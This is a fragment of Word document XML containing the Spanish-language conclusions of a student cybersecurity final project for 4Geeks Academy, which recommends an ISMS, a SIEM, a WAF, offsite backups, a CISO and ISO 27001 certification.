        <w:t xml:space="preserve">Conclusiones y Recomendaciones Finales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análisis demuestra que 4Geeks Academy presentaba un perfil de riesgo elevado derivado de configuraciones por defecto inseguras y ausencia de controles preventivos básicos. La implementación de las medidas documentadas ha reducido significativamente la superficie de ataque.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Recomendaciones prioritarias para la Dirección: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Aprobar e implementar el SGSI descrito como marco de gobernanza de la seguridad de la organización.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Asignar presupuesto para las herramientas identificadas (SIEM, WAF, solución de backups offsite).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Designar formalmente un Responsable de Seguridad de la Información (CISO o equivalente).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Iniciar el proceso de certificación ISO 27001 en el horizonte de 12 meses.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Establecer un programa de formación y concienciación continua para todo el personal.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La seguridad de la información es un proceso continuo, no un proyecto puntual. El SGSI proporciona el marco necesario para gestionar el riesgo de forma proactiva, cumplir con las obligaciones regulatorias y generar confianza en estudiantes, empleados y socios de 4Geeks Academy.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after="160" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="2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— Fin del Documento —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Proyecto Final de Ciberseguridad · 4Geeks Academy · 2024 · Confidencial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2F559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2026-05-25T10:14:39.678Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-25T10:14:39.679Z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